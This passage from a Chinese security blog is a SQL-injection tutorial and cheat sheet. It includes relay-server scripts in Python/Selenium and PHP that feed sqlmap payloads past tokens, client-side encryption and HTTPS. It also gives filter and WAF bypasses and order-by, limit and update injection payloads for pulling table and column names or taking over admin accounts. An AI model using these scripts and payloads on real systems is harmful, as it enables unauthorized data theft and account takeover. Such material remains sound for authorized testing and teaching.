<p>当网站做了token保护或js前端加密的情况下；</p>
<p>对于这些站点当手工发现了注入点，但并不适用于用sqlmap等工具跑，可以做中转注入；</p>
<p>本地起个Server，然后用sqlmap扫这个server，Server接收到payload后加到表单中提交。</p>
</blockquote>
<p><strong>Python+selenium做中转注入</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> selenium <span class="keyword">import</span> webdriver</span><br><span class="line">driver_path = <span class="string">"C:/Users/Administrator/AppData/Local/Programs/Python/Python37/Lib/site-packages/selenium/webdriver/chrome/chromedriver.exe"</span></span><br><span class="line">chrome = webdriver.Chrome(driver_path)</span><br><span class="line">chrome.get(<span class="string">"http://127.0.0.1"</span>)<span class="comment">#目标注入点</span></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">send</span><span class="params">(payload)</span>:</span></span><br><span class="line"><span class="comment">#起到中转payload效果。</span></span><br><span class="line">  chrome.find_element_by_id(<span class="string">"username"</span>).send_keys(payload) <span class="comment">#把payload填到有注入点的地方</span></span><br><span class="line">  chrome.find_element_by_id(<span class="string">"password"</span>).send_keys(<span class="string">"aaaa"</span>)</span><br><span class="line">  chrome.find_element_by_id(<span class="string">"submit"</span>).click()</span><br><span class="line">  <span class="keyword">return</span> <span class="string">"plase see flask server!"</span> <span class="comment">#随便返回一下不重要</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="comment"># 接收sqlmap传递过来的payload</span></span><br><span class="line">    payload = request.args.get(<span class="string">"payload"</span>)</span><br><span class="line">    <span class="keyword">return</span> send(payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>

<p><strong>用PHP做中转注入</strong></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//先开启php.ini 中的extension=php_curl.dll</span></span><br><span class="line">set_time_limit(<span class="number">1</span>);</span><br><span class="line">$curl = curl_init();<span class="comment">//初始化curl</span></span><br><span class="line">$id = $_GET[<span class="string">'id'</span>];</span><br><span class="line"><span class="comment">//替换id空格和=</span></span><br><span class="line">$id = str_replace(<span class="string">" "</span>,<span class="string">"%20"</span>,$id);</span><br><span class="line">$id = str_replace(<span class="string">"="</span>,<span class="string">"%3D"</span>,$id);</span><br><span class="line">$url = <span class="string">"http://xxx.com/aaa.php"</span>;</span><br><span class="line"><span class="comment">// 设置目标URL  </span></span><br><span class="line">curl_setopt($curl, CURLOPT_URL, $url);     </span><br><span class="line"><span class="comment">// 设置header   </span></span><br><span class="line">curl_setopt($curl, CURLOPT_HEADER, <span class="number">0</span>);    </span><br><span class="line"><span class="comment">// 设置cURL 参数，要求结果保存到字符串中还是输出到屏幕上。   </span></span><br><span class="line">curl_setopt($curl, CURLOPT_RETURNTRANSFER, <span class="number">0</span>);    </span><br><span class="line"><span class="comment">// 运行cURL，请求网页   </span></span><br><span class="line">$data = curl_exec($curl);   </span><br><span class="line"><span class="comment">// 关闭URL请求   </span></span><br><span class="line">curl_close($curl);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>sqlmap不能忽略证书，跑不了https的网站</strong> </p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$url = <span class="string">"https://x.x.x.x/aaa.php"</span>;</span><br><span class="line">$sql = $_GET[arg];</span><br><span class="line">$s = urlencode($sql);</span><br><span class="line">$params = <span class="string">"email=$s&amp;password=aa"</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">//写出到文件分析.</span></span><br><span class="line">$fp=fopen(<span class="string">'result.txt'</span>,<span class="string">'a'</span>);</span><br><span class="line">fwrite($fp,<span class="string">'Params:'</span>.$params.<span class="string">"\n"</span>);</span><br><span class="line">fclose($fp);</span><br><span class="line"></span><br><span class="line">$ch = curl_init();</span><br><span class="line">curl_setopt($ch, CURLOPT_URL, $url);</span><br><span class="line">curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, <span class="keyword">FALSE</span>); <span class="comment">// https请求 不验证证书和hosts</span></span><br><span class="line">curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, <span class="keyword">FALSE</span>);</span><br><span class="line">curl_setopt($ch, CURLOPT_RETURNTRANSFER, <span class="number">1</span>); </span><br><span class="line">curl_setopt($ch, CURLOPT_HEADER, <span class="number">0</span>);</span><br><span class="line">curl_setopt($ch, CURLOPT_USERAGENT, <span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0'</span>);</span><br><span class="line">curl_setopt($ch, CURLOPT_TIMEOUT, <span class="number">15</span>);</span><br><span class="line">  </span><br><span class="line">curl_setopt($ch, CURLOPT_POST, <span class="number">1</span>);    <span class="comment">// post 提交方式</span></span><br><span class="line">curl_setopt($ch, CURLOPT_POSTFIELDS, $params);</span><br><span class="line">  </span><br><span class="line">$output = curl_exec($ch);</span><br><span class="line">curl_close($ch);</span><br><span class="line">$a = strlen($output);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($a==<span class="number">2846</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"1"</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"2"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Base64变形注入"><a href="#Base64变形注入" class="headerlink" title="Base64变形注入"></a>Base64变形注入</h2><figure class="highlight"><table><tr><td class="code"><pre><span class="line">http://xxx.com/?id=MQ==		只加密参数</span><br><span class="line">http://xxx.com/?aWQ9MQ==	连参数名一起加密了</span><br></pre></td></tr></table></figure>

<p><strong>只加密参数，用sqlmap的脚本就行</strong></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">sqlmap -u http://xxx.com/?id=MQ== --tamper base64encode.py --dbs</span><br></pre></td></tr></table></figure>

<p><strong>参数名也加密了，用中转注入</strong></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="comment">//trans_sqli.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$id=base64_encode(<span class="string">"id="</span>.$_GET[<span class="string">'id'</span>]);</span><br><span class="line">	<span class="keyword">echo</span> file_get_contents(<span class="string">"http://xxx.com/sqli.php?&#123;$id&#125;"</span>);	<span class="comment">//sqli.php是原网页</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">sqlmap-u <span class="string">"http://127.0.0.1/trans_sqli.php?id=12"</span> -v3 --dbs</span><br></pre></td></tr></table></figure>

<h2 id="过滤了逗号怎么办"><a href="#过滤了逗号怎么办" class="headerlink" title="过滤了逗号怎么办"></a>过滤了逗号怎么办</h2><p><strong>盲注的时候</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">LIMIT M OFFSET N	</span><br><span class="line"><span class="comment">--这里的 M 是最大回显限度，N是偏移量</span></span><br><span class="line"><span class="comment">--与limit N,M 有相同效果</span></span><br><span class="line"></span><br><span class="line">' and ascii(substr((<span class="keyword">select</span> <span class="keyword">database</span>()),<span class="number">1</span>,<span class="number">1</span>))=xxx<span class="comment">#</span></span><br><span class="line"><span class="comment">--可变为</span></span><br><span class="line"><span class="string">' and ascii(substr((select database())from 1 for 1))=xxx#</span></span><br></pre></td></tr></table></figure>

<p><strong>union联合查询注入时</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span></span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> * <span class="keyword">from</span> ((<span class="keyword">select</span> <span class="number">1</span>)a <span class="keyword">JOIN</span> (<span class="keyword">select</span> <span class="number">2</span>)b <span class="keyword">JOIN</span> (<span class="keyword">select</span> <span class="number">3</span>)c)%<span class="number">23</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> * <span class="keyword">from</span> ((<span class="keyword">select</span> <span class="number">1</span>)a <span class="keyword">JOIN</span> (<span class="keyword">select</span> <span class="number">2</span>)b <span class="keyword">JOIN</span> (<span class="keyword">select</span> <span class="keyword">CONCAT_WS</span>(<span class="built_in">CHAR</span>(<span class="number">32</span>,<span class="number">58</span>,<span class="number">32</span>),<span class="keyword">user</span>(),<span class="keyword">database</span>(),<span class="keyword">version</span>()))c)%<span class="number">23</span></span><br></pre></td></tr></table></figure>

<h2 id="Between-And代替-“-gt-”-尖括号"><a href="#Between-And代替-“-gt-”-尖括号" class="headerlink" title="Between And代替 “&gt;” 尖括号"></a>Between And代替 “&gt;” 尖括号</h2><p>在<code>sqlmap</code>中使用between and 代替其它字符加上 <code>--tamper=between</code> 即可</p>
<p><strong>判断条件真假</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">2 &gt; 1   #真</span><br><span class="line">0 &gt; 1   #假</span><br><span class="line"><span class="comment">#以下用between and 实现判断真假</span></span><br><span class="line">2 between 1 and 3   <span class="comment">#真</span></span><br><span class="line">3 betwwen 1 and 2   <span class="comment">#假</span></span><br></pre></td></tr></table></figure>

<p><code>between and</code>还支持16进制,所以可以用16进制,来绕过单引号的过滤</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">database</span>() <span class="keyword">between</span> <span class="number">0x61</span> <span class="keyword">and</span> <span class="number">0x7a</span>;    //<span class="keyword">select</span> <span class="keyword">database</span>() <span class="keyword">between</span> <span class="string">'a'</span> <span class="keyword">and</span> <span class="string">'z'</span>;</span><br></pre></td></tr></table></figure>

<h2 id="未知列名情况下的注入利用"><a href="#未知列名情况下的注入利用" class="headerlink" title="未知列名情况下的注入利用"></a>未知列名情况下的注入利用</h2><p><code>mysql</code>版本&lt;5.0或在利用<code>SQL</code>注入的时候遇到了WAF；</p>
<p>安全狗3.5版本会直接拦截关键字<code>information_shema</code>；</p>
<p>从而无法获取数据表的列名，这时可以<strong>利用虚表获取数据</strong>。</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">-1 union <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> <span class="string">`4`</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span> <span class="keyword">union</span> <span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">users</span>)a <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>);</span><br><span class="line"><span class="comment">--可以通过不停的修改列名1，2，3，4来提取数据( 改这个用反引号包裹的`4`)</span></span><br></pre></td></tr></table></figure>

<p><a href="https://nosec.org/home/detail/2245.html" target="_blank" rel="noopener">参考</a></p>
<h1 id="Order-By注入"><a href="#Order-By注入" class="headerlink" title="Order-By注入"></a>Order-By注入</h1><blockquote>
<p>order by 注入是<code>SQL</code>注入中很常见的，被过滤的概率小；</p>
<p>可被用户控制的数据在order by 子句后边，即order参数可控。</p>
</blockquote>
<h3 id="利用报错"><a href="#利用报错" class="headerlink" title="利用报错"></a>利用报错</h3><h4 id="利用regexp"><a href="#利用regexp" class="headerlink" title="利用regexp"></a>利用regexp</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">http://192.168.239.2:81/?order=(<span class="keyword">select</span>+<span class="number">1</span>+regexp+<span class="keyword">if</span>(<span class="number">1</span>=<span class="number">1</span>,<span class="number">1</span>,<span class="number">0x00</span>)) 正常</span><br><span class="line"><span class="keyword">http</span>://<span class="number">192.168</span><span class="number">.239</span><span class="number">.2</span>:<span class="number">81</span>/?<span class="keyword">order</span>=(<span class="keyword">select</span>+<span class="number">1</span>+regexp+<span class="keyword">if</span>(<span class="number">1</span>=<span class="number">2</span>,<span class="number">1</span>,<span class="number">0x00</span>)) 错误</span><br></pre></td></tr></table></figure>

<h4 id="利用updatexml"><a href="#利用updatexml" class="headerlink" title="利用updatexml"></a>利用updatexml</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">http://192.168.239.2:81/?order=updatexml(1,if(1=1,1,user()),1)  正确</span><br><span class="line">http://192.168.239.2:81/?order=updatexml(1,if(1=2,1,user()),1)  错误</span><br></pre></td></tr></table></figure>

<h4 id="利用extractvalue"><a href="#利用extractvalue" class="headerlink" title="利用extractvalue"></a>利用extractvalue</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">http://192.168.239.2:81/?order=extractvalue(1,if(1=1,1,user())) 正确</span><br><span class="line">http://192.168.239.2:81/?order=extractvalue(1,if(1=2,1,user())) 错误</span><br></pre></td></tr></table></figure>

<h3 id="利用时间盲注"><a href="#利用时间盲注" class="headerlink" title="利用时间盲注"></a>利用时间盲注</h3><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">/?order=if(1=1,1,(<span class="keyword">SELECT</span>(<span class="number">1</span>)<span class="keyword">FROM</span>(<span class="keyword">SELECT</span>(<span class="keyword">SLEEP</span>(<span class="number">2</span>)))<span class="keyword">test</span>)) 正常响应时间</span><br><span class="line">/?<span class="keyword">order</span>=<span class="keyword">if</span>(<span class="number">1</span>=<span class="number">2</span>,<span class="number">1</span>,(<span class="keyword">SELECT</span>(<span class="number">1</span>)<span class="keyword">FROM</span>(<span class="keyword">SELECT</span>(<span class="keyword">SLEEP</span>(<span class="number">2</span>)))<span class="keyword">test</span>)) <span class="keyword">sleep</span> <span class="number">2</span>秒</span><br></pre></td></tr></table></figure>

<h3 id="数据猜解"><a href="#数据猜解" class="headerlink" title="数据猜解"></a>数据猜解</h3><p>以猜解user()即<code>root@localhost</code>为例子，由于只能一位一位猜解；</p>
<p>可以利用<code>SUBSTR</code>,<code>SUBSTRING</code>,<code>MID</code>,以及<code>left</code>和<code>right</code>可以精准分割出每一位子串；</p>
<p>然后就是比较操作了可以利用<code>=</code>,<code>like</code>,<code>regexp</code>等；</p>
<p>这里要注意<code>like</code>是不区分大小写；</p>
<p>通过以下可以得知user()第一位为<code>r</code>,ascii码的16进制为0x72</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">http://192.168.239.2:81/?order=(<span class="keyword">select</span>+<span class="number">1</span>+regexp+<span class="keyword">if</span>(<span class="keyword">substring</span>(<span class="keyword">user</span>(),<span class="number">1</span>,<span class="number">1</span>)=<span class="number">0x72</span>,<span class="number">1</span>,<span class="number">0x00</span>)) 正确</span><br><span class="line"><span class="keyword">http</span>://<span class="number">192.168</span><span class="number">.239</span><span class="number">.2</span>:<span class="number">81</span>/?<span class="keyword">order</span>=(<span class="keyword">select</span>+<span class="number">1</span>+regexp+<span class="keyword">if</span>(<span class="keyword">substring</span>(<span class="keyword">user</span>(),<span class="number">1</span>,<span class="number">1</span>)=<span class="number">0x71</span>,<span class="number">1</span>,<span class="number">0x00</span>)) 错误</span><br></pre></td></tr></table></figure>

<p><strong>猜解当前数据的表名</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">/?order=(<span class="keyword">select</span>+<span class="number">1</span>+regexp+<span class="keyword">if</span>(<span class="keyword">substring</span>((<span class="keyword">select</span>+<span class="keyword">concat</span>(table_name)<span class="keyword">from</span>+information_schema.tables+<span class="keyword">where</span>+table_schema%<span class="number">3</span>ddatabase()+<span class="keyword">limit</span>+<span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)=<span class="number">0x67</span>,<span class="number">1</span>,<span class="number">0x00</span>))  正确</span><br><span class="line">/?<span class="keyword">order</span>=(<span class="keyword">select</span>+<span class="number">1</span>+regexp+<span class="keyword">if</span>(<span class="keyword">substring</span>((<span class="keyword">select</span>+<span class="keyword">concat</span>(table_name)<span class="keyword">from</span>+information_schema.tables+<span class="keyword">where</span>+table_schema%<span class="number">3</span>ddatabase()+<span class="keyword">limit</span>+<span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)=<span class="number">0x66</span>,<span class="number">1</span>,<span class="number">0x00</span>)) 错误</span><br></pre></td></tr></table></figure>

<p><strong>猜解指定表名中的列名</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">/?order=(<span class="keyword">select</span>+<span class="number">1</span>+regexp+<span class="keyword">if</span>(<span class="keyword">substring</span>((<span class="keyword">select</span>+<span class="keyword">concat</span>(column_name)<span class="keyword">from</span>+information_schema.columns+<span class="keyword">where</span>+table_schema%<span class="number">3</span>ddatabase()+<span class="keyword">and</span>+table_name%<span class="number">3</span>d0x676f6f6473+<span class="keyword">limit</span>+<span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)=<span class="number">0x69</span>,<span class="number">1</span>,<span class="number">0x00</span>)) 正常</span><br><span class="line">/?<span class="keyword">order</span>=(<span class="keyword">select</span>+<span class="number">1</span>+regexp+<span class="keyword">if</span>(<span class="keyword">substring</span>((<span class="keyword">select</span>+<span class="keyword">concat</span>(column_name)<span class="keyword">from</span>+information_schema.columns+<span class="keyword">where</span>+table_schema%<span class="number">3</span>ddatabase()+<span class="keyword">and</span>+table_name%<span class="number">3</span>d0x676f6f6473+<span class="keyword">limit</span>+<span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)=<span class="number">0x68</span>,<span class="number">1</span>,<span class="number">0x00</span>)) 错误</span><br></pre></td></tr></table></figure>

<p>然后结合Burp去猜解即可~（<a href="https://www.cnblogs.com/icez/p/Mysql-Order-By-Injection-Summary.html" target="_blank" rel="noopener">参考</a>）</p>
<p>知道了原理，用Burp去猜解即可</p>
<h1 id="limit-注入"><a href="#limit-注入" class="headerlink" title="limit 注入"></a>limit 注入</h1><p><strong>先科普下limit的用法</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">格式：</span><br><span class="line">limit m,n</span><br><span class="line"><span class="comment">--m是记录开始的位置，n是取n条数据</span></span><br><span class="line">limit 0,1</span><br><span class="line"><span class="comment">--从第一条开始，取一条数据</span></span><br></pre></td></tr></table></figure>

<p>(适用于5.0.0&lt;mysql&lt;5.6.6的版本)</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="keyword">field</span> <span class="keyword">FROM</span> <span class="keyword">table</span> <span class="keyword">WHERE</span> <span class="keyword">id</span> &gt; <span class="number">0</span> <span class="keyword">ORDER</span> <span class="keyword">BY</span> <span class="keyword">id</span> <span class="keyword">LIMIT</span> （注入点）</span><br></pre></td></tr></table></figure>

<p>确认有注入点前面有 order by 关键字,没法用union</p>
<p>在LIMIT后面可以跟两个函数，PROCEDURE 和 INTO，INTO除非有写入shell的权限，否则是无法利用的;</p>
<p><strong>报错注入：</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id=1 procedure analyse(extractvalue(rand(),concat(0x7e,database())),1);</span><br></pre></td></tr></table></figure>

<p><strong>时间型盲注：</strong></p>
<p>直接使用sleep不行，需要用BENCHMARK代替 </p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id=1 PROCEDURE analyse((<span class="keyword">select</span> extractvalue(<span class="keyword">rand</span>(),<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">IF</span>(<span class="keyword">MID</span>(<span class="keyword">database</span>(),<span class="number">1</span>,<span class="number">1</span>) <span class="keyword">LIKE</span> <span class="number">5</span>, <span class="keyword">BENCHMARK</span>(<span class="number">5000000</span>,<span class="keyword">SHA1</span>(<span class="number">1</span>)),<span class="number">1</span>))))),<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<h1 id="SQL里面只有update怎么利用？"><a href="#SQL里面只有update怎么利用？" class="headerlink" title="SQL里面只有update怎么利用？"></a>SQL里面只有update怎么利用？</h1><p>这种方式会修改数据，很危险，在授权测试允许的情况下才考虑</p>
<p>一般在用户修改密码的地方</p>
<p>先理解这句 <code>SQL</code></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">UPDATE</span> <span class="keyword">user</span> <span class="keyword">SET</span> <span class="keyword">password</span>=<span class="string">'MD5($password)'</span>, homepage=<span class="string">'$homepage'</span> <span class="keyword">WHERE</span> <span class="keyword">id</span>=<span class="string">'$id'</span></span><br></pre></td></tr></table></figure>

<p>如果此 <code>SQL</code> 被修改成以下形式，就实现了注入</p>
<p><strong>1、修改 homepage 值为<code>http://baidu.com&#39;, userlevel=&#39;3</code></strong></p>
<p>之后 SQL 语句变为</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">UPDATE</span> <span class="keyword">user</span> <span class="keyword">SET</span> <span class="keyword">password</span>=<span class="string">'mypass'</span>, homepage=<span class="string">'http://baidu.com'</span>, userlevel=<span class="string">'3'</span> <span class="keyword">WHERE</span> <span class="keyword">id</span>=<span class="string">'$id'</span></span><br></pre></td></tr></table></figure>

<p><code>userlevel</code> 为用户级别</p>
<p><strong>2、修改 password 值为<code>mypass)&#39; WHERE username=&#39;admin&#39;#</code></strong></p>
<p>之后 <code>SQL</code> 语句变为</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">UPDATE</span> <span class="keyword">user</span> <span class="keyword">SET</span> <span class="keyword">password</span>=<span class="string">'MD5(mypass)'</span> <span class="keyword">WHERE</span> username=<span class="string">'admin'</span><span class="comment">#)', homepage='$homepage' WHERE id='$id'</span></span><br></pre></td></tr></table></figure>

<p><strong>3、修改 id 值为<code>&#39; OR username=&#39;admin&#39;</code></strong><br> 之后 <code>SQL</code> 语句变为</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">UPDATE</span> <span class="keyword">user</span> <span class="keyword">SET</span> <span class="keyword">password</span>=<span class="string">'MD5($password)'</span>, homepage=<span class="string">'$homepage'</span> <span class="keyword">WHERE</span> <span class="keyword">id</span>=<span class="string">''</span> <span class="keyword">OR</span> username=<span class="string">'admin'</span></span><br></pre></td></tr></table></figure>

<h1 id="其它数据库参考"><a href="#其它数据库参考" class="headerlink" title="其它数据库参考"></a>其它数据库参考</h1><p><a href="https://www.anquanke.com/post/id/86011" target="_blank" rel="noopener">MSSQL 注入攻击与防御</a></p>
<p><a href="https://www.tr0y.wang/2019/04/16/Oracle%E6%B3%A8%E5%85%A5%E6%8C%87%E5%8C%97/index.html" target="_blank" rel="noopener">Orcle注入</a></p>

            </div>
        
        <footer class="article-footer">
        </footer>
    </div>
</article>


    
<nav id="article-nav">
    
        <a href="/2020/08/12/%E3%80%901%E3%80%91Web%E5%AE%89%E5%85%A8/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/" id="article-nav-newer" class="article-nav-link-wrap">
            <strong class="article-nav-caption">Newer</strong>
            <div class="article-nav-title">
                
                    XSS跨站脚本攻击
                
            </div>
        </a>
    
    
        <a href="/2020/08/12/%E3%80%903%E3%80%91%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E3%80%908%20%E8%93%9D%E9%98%9F%E3%80%91%E5%9F%BA%E7%BA%BF%E5%8A%A0%E5%9B%BA/Linux%E5%AE%89%E5%85%A8%E5%8A%A0%E5%9B%BA/" id="article-nav-older" class="article-nav-link-wrap">
            <strong class="article-nav-caption">Older</strong>
            <div class="article-nav-title">Linux安全加固</div>
        </a>
    
</nav>





    
    




<!-- baidu url auto push script -->
<script type="text/javascript">
    !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=window.location.href,o=document.referrer;if(!e.test(r)){var n="//api.share.baidu.com/s.gif";o?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var t=new Image;t.src=n}}(window);
</script>     
</section>
        </div>
        <footer id="footer">
    <div class="outer">
        <div id="footer-info" class="inner">
            wintrysec &copy; 2020 
            <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-nc-nd/4.0/80x15.png" /></a>
            <br> Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>. Theme - <a href="https://github.com/zthxxx/hexo-theme-Wikitten" target="_blank" rel="noopener">wikitten</a>
            
                <br>
                <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i> <span id="busuanzi_value_site_pv"></span></span>
                &nbsp;|&nbsp;
                <span id="busuanzi_container_site_pv"><i class="fa fa-user"></i> <span id="busuanzi_value_site_uv"></span></span>
            
        </div>
    </div>
</footer>

        

    
        
<script src="/libs/lightgallery/js/lightgallery.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-thumbnail.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-pager.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-autoplay.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-fullscreen.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-zoom.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-hash.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-share.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-video.min.js"></script>

    
    
        
<script src="/libs/justified-gallery/jquery.justifiedGallery.min.js"></script>

    
    
        <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true,
            TeX: {
                equationNumbers: {
                  autoNumber: 'AMS'
                }
            }
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script async src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
    



<!-- Custom Scripts -->

<script src="/js/main.js"></script>


    </div>
</body>
</html>